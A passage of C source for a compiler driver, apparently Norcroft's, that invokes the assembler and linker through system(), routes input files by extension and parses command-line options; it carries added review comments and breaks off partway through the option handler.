/* Call the assembler to assemble a '.s' file */
/* */
/*************************************************************/
#ifndef HOST_CANNOT_INVOKE_ASSEMBLER

#ifndef target_asm_options_
#  define target_asm_options_(x) ""
#endif

/* Assemble 'asm_file' into 'obj_file' by invoking the configured external
 * assembler through system().  The command is built by running the same
 * loop twice: first with cmd == NULL so cmd_cat only measures the length,
 * then again to fill the buffer (a stack buffer when it fits, SynAlloc
 * store otherwise).  Returns the system() status. */
static int assembler(ToolEnv *t, const char *asm_file, const char *obj_file)
{
    int32 flags = driver_flags;
    char *cmd;
    char small_cmd[SMALL_COMMAND];
    alloc_perfileinit();
#ifndef NO_CONFIG
    config_init(t);
#endif
    cmd = NULL;
    for (;;)
    {   /* once round to count the length and once to copy the strings... */
        int32 cmdlen = cmd_cat(cmd, 0, setupenv.assembler_cmd);
        cmdlen = cmd_cat(cmd, cmdlen, target_asm_options_(t));
        if (flags & KEY_DEBUG) cmdlen = cmd_cat(cmd, cmdlen, " -g");
        if (flags & KEY_READONLY) cmdlen = cmd_cat(cmd, cmdlen, " -R");
        /* Unix assemblers take "-o obj src"; other hosts take "src obj". */
        if (!Compiling_On_Unix) cmdlen = cmd_cat(cmd, cmdlen, asm_file);
        if (Compiling_On_Unix) cmdlen = cmd_cat(cmd, cmdlen, "-o");
        cmdlen = cmd_cat(cmd, cmdlen, obj_file);
        if (Compiling_On_Unix) cmdlen = cmd_cat(cmd, cmdlen, asm_file);
        if (cmd != NULL) break;
        if (cmdlen < SMALL_COMMAND)
            cmd = small_cmd;
        else
            cmd = (char *)SynAlloc(cmdlen+1);
    }
    if (driver_flags & KEY_VERIFY) cc_msg("[%s]\n", cmd);
    {   int rc = system(cmd);
        drop_local_store();
        return rc;
    }
}
#endif
/*************************************************************/
/* */
/* Link compiled files together */
/* */
/*************************************************************/
#ifndef target_lib_name_
#  define target_lib_name_(e,x) x
#endif

#ifndef HOST_CANNOT_INVOKE_LINKER
#ifndef LINKER_IS_SUBPROGRAM
/* State for building the link command as a single string: the buffer under
 * construction (NULL during the sizing pass, see cmd_cat) and its length. */
typedef struct {
    char *cmd;
    int32 cmdlen;
    ToolEnv *t;
} LinkerLibRec;

/* -L.* enumeration callback: append one library to the command line.
 * &val[1] skips the leading '=' byte of the stored value (cf. TE_Integer). */
static int LibEnum_F(void *arg, char const *name, char const *val, bool readonly) {
    LinkerLibRec *llr = (LinkerLibRec *)arg;
    IGNORE(readonly); IGNORE(name);
    llr->cmdlen = cmd_cat(llr->cmd, llr->cmdlen, target_lib_name_(llr->t, &val[1]));
    return 0;
}
#else
/* Subprogram-linker variant: libraries are collected into an argv instead
 * of a flat command string. */
typedef struct {
    char **argv;
    int count;
    ToolEnv *t;
} LinkerLibRec;

static int LibEnum_F(void *arg, char const *name, char const *val, bool readonly) {
    LinkerLibRec *llr = (LinkerLibRec *)arg;
    IGNORE(readonly); IGNORE(name);
    llr->argv[llr->count++] = modifiablecopy(target_lib_name_(llr->t, &val[1]));
    return 0;
}
#endif
/* Link the accumulated object files (ld_fil) with the accumulated
 * linker arguments (ld_arg), the selected startup file, and any
 * language/host libraries.  Either builds a host command line and runs
 * it with system(), or calls the built-in do_link() when
 * LINKER_IS_SUBPROGRAM is defined.  A non-zero link status bumps
 * main_error_count; in PCC mode with exactly one source file the
 * intermediate object file is deleted after a successful link. */
static void linker(ToolEnv *t, int32 flags)
{
#ifdef TARGET_IS_NULL /* Hmmm, but, but ... */
IGNORE(flags);
#else
Uint count;
const char *startup;
alloc_perfileinit();
#ifndef NO_CONFIG
config_init(t);
#endif
/* Choose the startup file according to the profiling options. */
switch (flags & (KEY_PROFILE | KEY_XPROFILE))
{
case KEY_PROFILE: startup = setupenv.profile_startup; break;
case KEY_XPROFILE: startup = setupenv.profile_g_startup; break;
default: startup = setupenv.link_startup; break;
}
#ifndef LINKER_IS_SUBPROGRAM
{ char *cmd = NULL;
int32 cmdlen, libstart;
char small_cmd[SMALL_COMMAND];
for (;;)
{ /* once round to count the length and once to copy the strings... */
cmdlen = 0;
cmdlen = cmd_cat(cmd, cmdlen, setupenv.link_cmd);
for (count = 0; count < ld_arg.n; ++count)
cmdlen = cmd_cat(cmd, cmdlen, ld_arg.v[count]);
cmdlen = cmd_cat(cmd, cmdlen, "-o");
cmdlen = cmd_cat(cmd, cmdlen, setupenv.output_file);
cmdlen = cmd_cat(cmd, cmdlen, startup);
for (count = 0; count < ld_fil.n; ++count)
cmdlen = cmd_cat(cmd, cmdlen, ld_fil.v[count]);
/* Remember where the library list starts: it is post-processed
 * below to turn commas into spaces. */
libstart = cmdlen;
if (flags & KEY_HOST_LIB)
cmdlen = cmd_cat(cmd, cmdlen, target_lib_name_(t, setupenv.host_lib));
#ifdef PASCAL
cmdlen = cmd_cat(cmd, cmdlen, target_lib_name_(t, setupenv.pas_lib));
#endif
#ifdef FORTRAN
cmdlen = cmd_cat(cmd, cmdlen, target_lib_name_(t, setupenv.fort_lib));
#endif
{ LinkerLibRec llr;
llr.cmd = cmd; llr.cmdlen = cmdlen; llr.t = t;
Tool_OrderedEnvEnumerate(t, "-L.", LibEnum_F, &llr);
cmdlen = llr.cmdlen;
}
/* Second pass (cmd non-NULL) has copied the strings: done. */
if (cmd != NULL) break;
/* After the counting pass, pick a stack buffer if the command
 * fits, otherwise allocate, and go round again to copy. */
if (cmdlen < SMALL_COMMAND)
cmd = small_cmd;
else
cmd = (char *)SynAlloc(cmdlen+1);
}
for (; libstart < cmdlen; libstart++)
{ /* space-separate, rather than comma-join, the library list */
if (cmd[libstart] == ',') cmd[libstart] = ' ';
}
if (driver_flags & KEY_VERIFY) cc_msg("[%s]\n", cmd);
count = system(cmd);        /* link status; tested below */
}
#else /* LINKER_IS_SUBPROGRAM */
/* Build an argv for the in-process linker: command name, ld_arg,
 * -o <output>, startup file, object files, libraries, NULL. */
{ char **argv = (char **)SynAlloc((ld_arg.n+ld_fil.n+7+TE_Count(t, "-L.")) * sizeof(char **));
extern int do_link(int argc, char **argv, backchat_Messenger *bc, void *bcarg);
argv[0] = modifiablecopy(setupenv.link_cmd);
memcpy(&argv[1], ld_arg.v, ld_arg.n * sizeof(char **));
count = ld_arg.n+1;
argv[count++] = "-o";
argv[count++] = modifiablecopy(setupenv.output_file);
if (*startup != 0) argv[count++] = modifiablecopy(startup);
memcpy(&argv[count], ld_fil.v, ld_fil.n * sizeof(char **));
count += ld_fil.n;
if (flags & KEY_HOST_LIB)
argv[count++] = modifiablecopy(target_lib_name_(t, setupenv.host_lib));
#ifdef PASCAL
argv[count++] = modifiablecopy(target_lib_name_(t, setupenv.pas_lib));
#endif
#ifdef FORTRAN
argv[count++] = modifiablecopy(target_lib_name_(t, setupenv.fort_lib));
#endif
{ LinkerLibRec llr;
llr.argv = argv; llr.count = count; llr.t = t;
Tool_OrderedEnvEnumerate(t, "-L.", LibEnum_F, &llr);
count = llr.count;
}
argv[count] = 0;
count = do_link(count, argv, backchat.send, backchat.handle);
}
#endif /* LINKER_IS_SUBPROGRAM */
if (count != 0) ++main_error_count;
/*
 * In PCC mode delete the '.o' file if only one file was compiled.
 * NB. (count==0) is used to check the link was ok.
 */
if ((LanguageIsPascal || StrEq(toolenv_lookup(t, ".lang"), "=-pcc"))
&& cc_fil.n == 1 && ld_fil.n == 1 && count == 0)
remove(ld_fil.v[0]);
drop_local_store();
#endif /* TARGET_IS_NULL */
}
#endif /* HOST_CANNOT_INVOKE_LINKER */
/* toolenv_enumerate callback: echo one environment binding as
 * " name value" on the message stream.  Always returns 0 so the
 * enumeration visits every entry. */
static int PrintEnv(void *context, char const *key, char const *value)
{
    IGNORE(context);
    cc_msg(" %s %s", key, value);
    return 0;
}
/*
* Process input file names.
*/
/* Process every input file name in v: classify each by extension and
 * dispatch it to the linker queue (.o/.a), the assembler (.s), or the
 * compiler proper (.c and friends), honouring -E/-M/-S/-c/-o flags.
 * Counts compiled sources in cc_fil.n for linker()'s benefit and may
 * derive the default output file name from the first input. */
static void process_file_names(ToolEnv *t, ArgV *v)
{
Uint count, filc = v->n;
int32 flags = driver_flags;
UnparsedName unparse;
/*
 * Reset cc_filc here - we use it to count the actual number of .c files
 * (so linker() can delete the intermediate object file in the case that
 * there is exactly 1 C file), rather than the number of files to be
 * processed by this function.
 */
cc_fil.n = 0;
for (count = 0; count < filc; ++count)
{ char const *current = v->v[count];
int state = 0; /* hack for contorted program flow */
int extn_ch;
char *source_file, *listing_file = NULL, *md_file = NULL;
/* Reject over-long names outright (copy_unparse buffers are bounded). */
if (strlen(current) > MAX_TEXT-5)
{ cc_msg_lookup(driver_ignored_filename_overlong, current);
continue;
}
fname_parse(current, FNAME_SUFFIXES, &unparse);
#ifndef COMPILING_ON_UNIX
if (unparse.extn == NULL)
/* On non-Unix hosts use a sensible default if no extension was given */
#ifdef FOR_ACORN
if (!cplusplus_flag)
#endif
{ unparse.extn = LANG_EXTN_STRING;
unparse.elen = sizeof(LANG_EXTN_STRING)-1;
}
extn_ch = unparse.extn[0];
#else
if (unparse.extn == NULL)
extn_ch = 0;
else
extn_ch = unparse.extn[0];
#endif
/* NOTE: the cases below fall through deliberately; the fall-through
 * chains implement "-E/-M preprocess anything" behaviour. */
switch(extn_ch)
{
#ifndef HOST_CANNOT_INVOKE_LINKER
# ifdef COMPILING_ON_UNIX
case 'a':
# else
case 'O':
# endif
case 'o': if (!(flags & (KEY_PREPROCESS+KEY_MAKEFILE)))
{
/* Object/archive: queue straight for the linker. */
AddArg(&ld_fil, copy_unparse(&unparse, NULL));
break;
}
else cc_msg_lookup(driver_conflict_EM);
/* and fall through ... */
#endif
default: if (!(flags & (KEY_PREPROCESS+KEY_MAKEFILE)))
{ if ((flags & KEY_CFRONTPREPROCESS) != 0) goto case_lang_extn;
cc_msg_lookup(driver_unknown_filetype, current);
++cmd_error_count;
continue;
}
/* fall through again (-E, -M) */
#ifndef HOST_CANNOT_INVOKE_ASSEMBLER
/* The logical place for this code is at NO_OBJECT.. after ccom() call. */
# ifndef COMPILING_ON_UNIX
case 'S':
# endif
case 's': if (!(flags & (KEY_PREPROCESS+KEY_MAKEFILE)))
{ const char *asm_file = copy_unparse(&unparse, NULL);
const char *obj_file = copy_unparse(&unparse, OBJ_EXTN);
state = 1;  /* remember the assembler has already run */
if (assembler(t, asm_file, obj_file) != 0)
{ main_error_count++;
remove(obj_file);
}
/* and fall through... foo.s... */
}
/* fall through again (-E, -M, foo.s) */
#endif
#ifdef COMPILING_ON_UNIX
case LANG_UC_EXTN: /* unix foo.C for C++ (rework other hosts?) */
case 'i': /* for X/Open compliance (what about '.I'?) */
#else
case LANG_UC_EXTN:
#endif
case_lang_extn:
case LANG_EXTN:
{ char *out_file = setupenv.output_file;
char *out_name = NULL;
if ((flags & KEY_RENAME) && filc == 1 && !(flags & KEY_LINK))
/* Assert: KEY_RENAME => setupenv.output_file != NULL */
out_name = out_file;
else if (flags & KEY_ASM_OUT)
out_name = copy_unparse(&unparse, ASM_EXTN);
#ifdef NO_OBJECT_OUTPUT2
/* Turn "cc -c foo.c" into "cc -S foo.c"; as foo.s" */
if (!(flags & (KEY_PREPROCESS|KEY_MAKEFILE|KEY_ASM_OUT)))
out_name = copy_unparse(&unparse, ASM_EXTN);
#endif
if (flags & KEY_LISTING)
listing_file = copy_unparse(&unparse, setupenv.list);
if (flags & KEY_MD)
md_file = copy_unparse(&unparse, "d");
source_file = copy_unparse(&unparse, NULL);
if (out_file == NULL /* No default output file */
|| filc != 1 /* more than 1 file */
|| (flags & KEY_LINK) /* going to link */
|| !(flags & KEY_RENAME)) /* no -o <file> */
{
out_file = copy_unparse(&unparse, OBJ_EXTN);
}
/* else...
 * -o && no-link && 1-file && default-op-file
 */
if (out_name == NULL) out_name = out_file;
if (!(flags & (KEY_MAKEFILE+KEY_PREPROCESS)))
{
AddArg(&ld_fil, out_file);
if (state == 1)
/* already called the assembler so... */ break;
}
if (flags & KEY_VERIFY) {
cc_msg("[");
toolenv_enumerate(t, PrintEnv, NULL);
cc_msg("]\n");
}
/* Run the compiler proper on this source file. */
if (ccom(t, source_file, out_name, listing_file, md_file))
{ ++main_error_count;
#ifdef COMPILING_ON_RISC_OS
/* The next line is dirty and should be done by checking return code, */
/* not peeking at other's variables. */
if (errorcount) /* only delete o/p file if serious errors */
#endif
remove(out_name);
}
#ifdef NO_OBJECT_OUTPUT2 /* @@@ '2' is a temp hack */
#ifndef HOST_CANNOT_INVOKE_ASSEMBLER
/* Assemble the intermediate .s produced above, then discard it. */
if (!(flags & (KEY_PREPROCESS|KEY_MAKEFILE|KEY_ASM_OUT)))
{ if (assembler(t, out_name, out_file) != 0)
{ main_error_count++;
remove(out_file);
}
remove(out_name);
}
#endif
#endif
}
/* and for the benefit of linker(), count the sources */
++cc_fil.n;
break;
}
/*
 * If no output file has been given, derive one from the 1st file name.
 */
if (setupenv.output_file == NULL && (flags & KEY_LINK))
setupenv.output_file = copy_unparse(&unparse, setupenv.link_ext);
}
}
#ifdef FORTRAN
/* In the Fortran driver: if the option letter matches ch, report the
 * option as recognised-but-unimplemented and break out of the
 * enclosing switch.  (Used at the top of HandleArg cases.) */
# define FortranUnimplementedOption(ch,current)\
if (current[1] == ch) { nimp_option(current); break; }
#else
/* Expands to nothing outside the Fortran driver. */
# define FortranUnimplementedOption(ch,current)
#endif
/*************************************************************/
/* */
/* Validate the command line keywords */
/* */
/*************************************************************/
/* Sanity-check the parsed driver_flags: warn about and cancel
 * combinations of options that conflict (e.g. -E with -M, -p with -px,
 * Fortran -strict with -onetrip/-f66/-extend), then write the cleaned
 * flags back to driver_flags. */
static void validate_flags(void)
{
int32 flags = driver_flags;
#ifdef WANT_WHINGY_MSGS_EVEN_WHEN_WRONG
if (ld_arg.n != 0 && !(flags & KEY_LINK))
/* Beware: the next line catches most curios, but not -lxxx */
cc_msg_lookup(driver_ignored_linkerflags);
#endif
/* -arthur/-super style host libraries make no sense on Unix. */
if (Compiling_On_Unix && (flags & KEY_HOST_LIB))
{ cc_msg_lookup(driver_ignored_arthur_unix);
flags &= ~KEY_HOST_LIB;
}
/* -C (keep comments) only means anything with -E. */
if (flags & KEY_COMMENT && !(flags & KEY_PREPROCESS)) flags &= ~KEY_COMMENT;
/* -M and -E together (without -MD) conflict: drop -M. */
if ((flags & (KEY_MAKEFILE+KEY_PREPROCESS+KEY_MD)) ==
(KEY_MAKEFILE+KEY_PREPROCESS))
{
cc_msg_lookup(driver_conflict_EM);
flags &= ~KEY_MAKEFILE;
}
/* -px subsumes -p. */
if (flags & KEY_PROFILE && flags & KEY_XPROFILE) flags &= ~KEY_PROFILE;
#ifdef FORTRAN
if (flags & KEY_STRICT)
{ if (flags & KEY_ONETRIP)
{ cc_msg_lookup(driver_conflict_strict_onetrip);
flags &= ~KEY_ONETRIP;
}
if (flags & KEY_F66)
{ cc_msg_lookup(driver_conflict_strict_f66);
flags &= ~KEY_F66;
}
if (flags & KEY_LONGLINES)
{ cc_msg_lookup(driver_conflict_strict_extend);
flags &= ~KEY_LONGLINES;
}
}
/* -f66 already implies one-trip DO loops. */
if ((flags & KEY_F66) && (flags & KEY_ONETRIP))
{ cc_msg_lookup(driver_implies_f66_onetrip);
flags &= ~KEY_ONETRIP;
}
#endif
driver_flags = flags;
}
/* Print the driver's help text, substituting the invocation name into
 * each line of the NULL-terminated driver_help_text table. */
static void give_help(const char *command_name)
{
#ifdef HOST_WANTS_NO_BANNER
    /* Startup suppressed the banner on this host, so show it here. */
    msg_printf(driver_banner);
#endif
#ifdef TIME_LIMIT
    {   time_t expire = TIME_LIMIT;
        msg_fprintf(driver_expire, VENDOR_NAME, ctime(&expire));
    }
#endif
    {   msg_t *line = driver_help_text;
        for (;;) {
            msg_printf(*line, command_name);
            if (*++line == NULL) break;
        }
    }
}
/*************************************************************/
/* */
/* Set command line options for current flags */
/* */
/*************************************************************/
#ifdef FORTRAN
/* Buffers for the synthesised "-zpw<n>"/"-zpx<n>" pragma options. */
static char pragmax[16];
static char pragmaw[16];
#endif
/* Translate accumulated driver flags into compiler options: for
 * Fortran, encode the F66/onetrip/longlines choices as -zpw/-zpx
 * pragma arguments; on Unix/Acorn targets, remove -ZS/-ZI
 * configuration when -strict was given. */
static void set_flag_options(ToolEnv *t)
{
#ifdef FORTRAN
int32 flags = driver_flags;
int32 pragmaw_flags = 0;
if (flags & KEY_ONETRIP) pragmaw_flags |= F66_ONETRIP;
if (flags & KEY_F66)
pragmaw_flags |= (F66_ONETRIP + F66_IOSUBLIST + F66_INTRINSGO);
if (flags & KEY_LONGLINES) pragmax_flags |= OPT_LONGLINES;
/* -strict cancels all extensions accumulated in pragmax_flags. */
if (flags & KEY_STRICT) pragmax_flags = 0;
/* NOTE(review): "%-lu" uses the '-' (left-justify) flag with no field
 * width, which has no effect; presumably plain "%lu" was meant. */
sprintf(pragmaw, "-zpw%-lu", pragmaw_flags);
sprintf(pragmax, "-zpx%-lu", pragmax_flags);
new_cc_arg(pragmaw);
new_cc_arg(pragmax);
#endif
#if defined(TARGET_IS_UNIX) && defined (COMPILING_ON_ACORN_KIT)
/* Remove -ZS<system> and -ZI<file> if -strict... */
/* AM: why? Maybe of more general use? */
if (driver_flags & KEY_STRICT)
{ tooledit_insert(t, "-ZI", NULL);
tooledit_insert(t, "-ZS", NULL);
}
#else
IGNORE(t);
#endif
}
/* Report an unrecognised or malformed command-line option and record
 * it as a command-line error. */
static void bad_option(const char *opt)
{
    cc_msg_lookup(driver_option_bad, opt);
    cmd_error_count += 1;
}
#ifdef FORTRAN
/* Report a command-line option that is recognised but not implemented
 * in the Fortran driver, and count it as a command-line error. */
static void nimp_option(const char *opt)
{
cc_msg_lookup(driver_option_nimp, opt);
++cmd_error_count;
}
#endif
/* State for FindLast's enumeration over the tool environment. */
typedef struct {
char const *prefix;   /* name prefix to match, e.g. "-I." */
size_t prefixlen;     /* strlen(prefix), precomputed */
uint32 n;             /* largest hex suffix seen so far */
} FindLastRec;
/* Enumeration callback: for names of the form <prefix><hex>, keep the
 * maximum hexadecimal suffix (base 16, matching the %lx used when the
 * entries are created in AddInclude). */
static int FindLast_F(void *arg, char const *name, char const *val) {
FindLastRec *fr = (FindLastRec *)arg;
IGNORE(val);
if (StrnEq(name, fr->prefix, fr->prefixlen)) {
uint32 n = strtoul(&name[fr->prefixlen], NULL, 16);
if (n > fr->n) fr->n = n;
}
return 0;
}
/* Scan the tool environment for names of the form <prefix><hex> and
 * return the largest hex suffix found, or 0 when none match. */
static uint32 FindLast(ToolEnv *t, char const *prefix) {
    FindLastRec rec;
    rec.n = 0;
    rec.prefix = prefix;
    rec.prefixlen = strlen(prefix);
    toolenv_enumerate(t, FindLast_F, &rec);
    return rec.n;
}
/* Insert a search-path/library entry into the tool environment under a
 * key of the form "<prefix><hex>.<val>".  The hex number preserves
 * insertion order: it is the highest existing suffix for this prefix
 * rounded up to the next 0x100000 "bucket", so each new entry sorts
 * after all earlier ones (FindLast_F reads it back with base-16
 * strtoul). */
static void AddInclude(ToolEnv *t, char const *prefix, char const *val) {
char b[FILENAME_MAX+16];
uint32 n = FindLast(t, prefix);
/* %lx requires an unsigned long argument; the previous (long) cast was
 * formally undefined behaviour for a conversion of unsigned values. */
sprintf(b, "%s%lx.%s", prefix, (unsigned long)((n + 0x1fffff) & ~0xfffff), val);
tooledit_insertwithjoin(t, b, '=', val);
}
/* Aliases mapping two-letter option-style names (as built by
 * EnvFlagSet, ".f<letter>") to their canonical environment names. */
static struct { char const *name; char const *alias; } const EnvNames[] =
{ { ".-Isearch",".fk" },
{ ".rolits", ".fw" },
{ ".enums", ".fy" },
{ ".swilr", ".fz" }
};
/* Map an option alias (e.g. ".fk") to its canonical environment name
 * via the EnvNames table; unknown aliases map to themselves. */
static char const *EnvName(char const *alias) {
    Uint k;
    Uint limit = sizeof(EnvNames) / sizeof(EnvNames[0]);
    for (k = 0; k < limit; ++k) {
        if (StrEq(alias, EnvNames[k].alias))
            return EnvNames[k].name;
    }
    return alias;
}
/* Process a string of single-letter feature flags (as in -f..., -W...,
 * -E...): '+' and '-' toggle the sense of the following letters; each
 * valid letter (one of `valid`, case-folded) is recorded in the tool
 * environment under the name ".<type><letter>" (possibly aliased via
 * EnvName) with value "=-<type>[+]<letter>".  Invalid letters warn
 * unless ignoreerrors. */
static void EnvFlagSet(ToolEnv *t, char const *opts, int type, char const *valid, bool ignoreerrors) {
char name[4]; char val[8];   /* ".Xc"+NUL = 4; "=-X+c"+NUL <= 8 */
bool plus = NO;
int opt;
for (; (opt = *opts) != 0; ++opts)
if (opt == '+')
plus = YES;
else if (opt == '-')
plus = NO;
else {
int ch = safe_tolower(opt);
if (strchr(valid, ch) == 0) {
if (!ignoreerrors) cc_warn(warn_option_letter, type, opt);
} else {
sprintf(name, ".%c%c", type, ch);
if (plus)
sprintf(val, "=-%c+%c", type, ch);
else
sprintf(val, "=-%c%c", type, ch);
tooledit_insert(t, EnvName(name), val);
}
}
}
/* Record a -D macro definition in the tool environment.  "NAME" is
 * stored as key "-DNAME" with value "?"; "NAME=VALUE" as key "-DNAME"
 * joined with "=VALUE".
 * NOTE(review): b is a fixed 256-byte buffer; a command-line argument
 * longer than ~253 chars would overflow it — verify inputs are bounded
 * upstream (cf. MAX_TEXT check in process_file_names). */
static void AddDefine(ToolEnv *t, char const *s) {
char b[256];
char *equalp = strchr(s, '=');
if (equalp == NULL) {
sprintf(b, "-D%s", s);
tooledit_insert(t, b, "?");
} else {
int l = equalp-s;   /* length of the macro name before '=' */
sprintf(b, "-D%.*s", l, s);
tooledit_insertwithjoin(t, b, '=', equalp);
}
}
/* Process the letters of a -zq<letters> internal-debugging option:
 * each letter ors a DEBUG_* bit into sysdebugmask; some letters also
 * bump per-subsystem verbosity counters, and 'Z' raises
 * syserr_behaviour (and re-enables SIGINT for backtraces where
 * supported).  Unknown letters warn. */
static void debug_set(char const *opts) {
int opt;
for (; (opt = *opts) != 0; ++opts) {
uint32 debugmask = 0;
switch (safe_toupper(opt))
{
#ifdef ENABLE_AETREE
case 'A': ++aetree_debugcount;
debugmask = DEBUG_AETREE; break;
#endif
case 'B': debugmask = DEBUG_BIND; break;
#ifdef ENABLE_CSE
case 'C': ++cse_debugcount;
debugmask = DEBUG_CSE; break;
#endif
case 'D': debugmask = DEBUG_DATA; break;
case 'E': debugmask = DEBUG_TEMPLATE; break;
case 'F': debugmask = DEBUG_FNAMES; break;
case 'G': debugmask = DEBUG_CG; break;
case 'H': debugmask = DEBUG_SPILL; break;
case 'I': ++files_debugcount;
debugmask = DEBUG_FILES; break;
case 'J': debugmask = DEBUG_SR; break;
#ifdef ENABLE_LOCALCG
case 'K': ++localcg_debugcount;
debugmask = DEBUG_LOCALCG; break;
#endif
case 'L': debugmask = DEBUG_LEX; break;
case 'M': debugmask = DEBUG_MAPSTORE; break;
case 'O': debugmask = DEBUG_OBJ; break;
case 'P': debugmask = DEBUG_PP; break;
case 'Q': debugmask = DEBUG_Q; break;
case 'R': debugmask = DEBUG_REGS; break;
case 'S': debugmask = DEBUG_SYN; break;
case 'T': debugmask = DEBUG_TYPE; break;
case 'U': debugmask = DEBUG_STORE; break;
case 'W': debugmask = DEBUG_2STORE; break;
case 'X': debugmask = DEBUG_X; break;
case 'Y': debugmask = DEBUG_LOOP; break;
case 'Z': ++syserr_behaviour;   /* no mask bit; changes syserr handling */
#ifndef COMPILING_ON_MSDOS
#ifdef __CC_NORCROFT
(void) signal(SIGINT, SIG_DFL); /* permit NorCroft backtrace */
#endif
#endif
break;
default: cc_warn(warn_option_zq, opt);
}
sysdebugmask |= debugmask;
}
}
/* Build a debug-flag string into s: first the letters of fl whose bit
 * (1 << (letter - 'a')) is clear in tflags, then a '+', then the
 * letters whose bit is set, then a terminating NUL.  The caller must
 * supply a buffer of at least strlen(fl) + 2 bytes. */
static void AddDebugFlags(char *s, uint32 tflags, char const *fl) {
    char const *letter;
    /* pass 1: letters with their bit clear go before the '+' */
    for (letter = fl; *letter != 0; letter++) {
        if ((tflags & (1L << (*letter - 'a'))) == 0)
            *s++ = *letter;
    }
    *s++ = '+';
    /* pass 2: letters with their bit set go after the '+' */
    for (letter = fl; *letter != 0; letter++) {
        if ((tflags & (1L << (*letter - 'a'))) != 0)
            *s++ = *letter;
    }
    *s = 0;
}
/* Bookkeeping for interactions between -O and -g: remember which were
 * seen so read_options can reconcile them afterwards. */
static int ogflags;
#define OG_O 1
#define OG_G 2
#define OG_GX 4
/* Handle a single '-' command-line option `current`.  `nextarg` is the
 * following argv entry (or NULL); the return value says whether it was
 * consumed as this option's argument.  Recognised options update the
 * tool environment and/or driver_flags; unrecognised ones are either
 * passed to the linker or reported via bad_option.
 *
 * BUG FIX: every occurrence of the mojibake token "¤t" (an
 * HTML-entity corruption of "&curren" + "t") has been restored to
 * "&current" — without this the function does not compile. */
static bool HandleArg(ToolEnv *t, char const *current, char const *nextarg, bool ignoreerrors) {
int32 flags = driver_flags;
int uc_opt = safe_toupper(current[1]);
bool usednext = NO;
char b[512];
/* First switch: reject options that take no suffix but were given one. */
switch(uc_opt)
{
#ifdef FORTRAN
case 'F': if (current[1] == 'f') break;
/* @@@ LDS 10Aug89 - DO NOT CATCH 'O' HERE - IT BREAKS Unix Makefiles */
case 'M': if (current[1] == 'M') break;
case 'U':
case 'V':
#else
#ifndef DISABLE_ERRORS
case 'E': if (current[2] == 'S' && current[3] == 0) break;
#endif
#ifndef PASCAL /*ECN*/
case 'R':
#endif
#endif
case 'C':
case 'S': if (current[2] == 0) break;
if (!ignoreerrors) bad_option(current);
}
/* Second switch: act on the option.  Cases fall through deliberately
 * in several places (marked in the original comments). */
switch(uc_opt)
{
#ifdef FORTRAN
case '1': flags |= KEY_ONETRIP;
break;
case 'C': if (current[1] == 'c') flags &= ~KEY_LINK;
else pragmax_flags |= OPT_CHECKSUB;
break;
case 'I': if ((current[1] == 'i') && (current[2] == '2'))
pragmax_flags |= OPT_DEFHINTEGER;
else goto may_take_next_arg;
break;
case 'N': break;
case 'O': if (current[1] == 'o') goto may_take_next_arg;
if (current[2] != 0) /* -O has no effect currently */
{
int n = (current[2] - '0');
if ((current[3] != 0) || (n < 0) || (n > MINO_MAX)) {
if (!ignoreerrors) bad_option(current);
} else
{
new_cc_arg((n & MINO_CSE) ? "-ZPZ1" : "-ZPZ0");
if (n & MINO_NAO) pragmax_flags |= OPT_NOARGALIAS;
else pragmax_flags &= ~OPT_NOARGALIAS;
}
}
break;
case 'R': if (current[1] == 'R') nimp_option(current);
else {
if (current[2] == '8')
pragmax_flags |= OPT_DEFDOUBLE;
else {
new_cc_arg("-R");
if (Compiling_On_Unix) flags |= KEY_READONLY;
}
} break;
case 'U': if (current[1] == 'U') pragmax_flags &= ~EXT_CASEFOLD;
else pragmax_flags |= OPT_IMPUNDEFINED;
break;
case 'V': if (current[1] == 'v') {
new_cc_arg("-FB");
if (!ignoreerrors) cc_msg_lookup(driver_banner);
}
else goto link_command;
break;
#else /* FORTRAN */
case 'C': if (current[1] == 'c')
flags &= ~KEY_LINK;
else
tooledit_insert(t, "-C", "?");
break;
case 'I':
case 'J': goto may_take_next_arg;
case 'O': if (current[1] == 'o') goto may_take_next_arg;
ogflags |= OG_O;
if (current[2] != 0) {
if (cistreq(&current[2], "time"))
tooledit_insert(t, "-O", "=time");
else if (cistreq(&current[2], "space"))
tooledit_insert(t, "-O", "=space");
else if (!ignoreerrors)
bad_option(current);
}
break;
#endif /* FORTRAN */
case '\0': flags |= KEY_STDIN; /* '-' on its own denotes stdin... */
break;
case 'E': FortranUnimplementedOption('E', current);
#ifdef DISABLE_ERRORS
/* provide support for -Exyz to suppress certain errors. */
if (current[2] != 0) {
EnvFlagSet(t, &current[2], 'E', "acfilmpvz", ignoreerrors);
break;
}
#endif
if (Compiling_On_Unix && current[1] == 'e')
goto may_take_next_arg; /* X/Open -e epsym to ld */
#ifdef COMPILING_ON_MVS
if (current[2])
{ if (!ignoreerrors) cc_warn(warn_option_E, current);
break;
}
#endif
tooledit_insert(t, ".pp_only", "?");
flags &= ~KEY_LINK;
break;
case 'F': FortranUnimplementedOption('F', current);
EnvFlagSet(t, &current[2], 'f', "abcdefhijklmnopqrstuvwxyz", ignoreerrors);
break;
case 'G': ogflags |= OG_G;
if (current[2] == 0) {
tooledit_insert(t, "-g", "=+");
tooledit_insert(t, "-gt", "=+flvp");
tooledit_insert(t, "-gx", "?");
} else if (current[2] == 'x') {
ogflags |= OG_GX;
tooledit_insertwithjoin(t, "-gx", '=', &current[3]);
/* just option setting; no -g implication */
break;
} else if (current[2] == 't') {
tooledit_insertwithjoin(t, "-gt", '=', &current[3]);
/* just option setting; no -g implication */
break;
} else if (current[2] == '-') {
tooledit_insert(t, "-g", "=-");
break;
} else if (current[2] == '+') {
tooledit_insert(t, "-g", "=+");
break;
} else {
/* old fashioned -g with flags option */
char const *p = &current[2];
int ch;
uint32 tflags = 0, optflags = 0;
while ((ch = *p++) != 0)
switch (ch) {
case 'f': case 'l': case 'v': case 'p':
tflags |= (1L << (ch - 'a')); break;
case 'c': case 'r': case 'g': case 'o':
optflags |= (1L << (ch - 'a')); break;
}
if (tflags == 0)
tooledit_insert(t, "-gt", "=+flvp");
else {
char s[6];
AddDebugFlags(s, tflags, "flpv");
tooledit_insertwithjoin(t, "-gt", '=', s);
}
if (optflags == 0)
tooledit_insert(t, "-gx", "?");
else {
char s[5]; int i = 0;
for (ch = 'a'; ch <= 'z'; ch++)
if (optflags & (1L << (ch - 'a')))
s[i++] = ch;
s[i] = 0;
ogflags |= OG_GX;
tooledit_insertwithjoin(t, "-gx", '=', s);
}
tooledit_insert(t, "-g", "=+");
}
if (Compiling_On_Unix)
AddInclude(t, "-L.", "g");
else {
flags |= KEY_DEBUG;
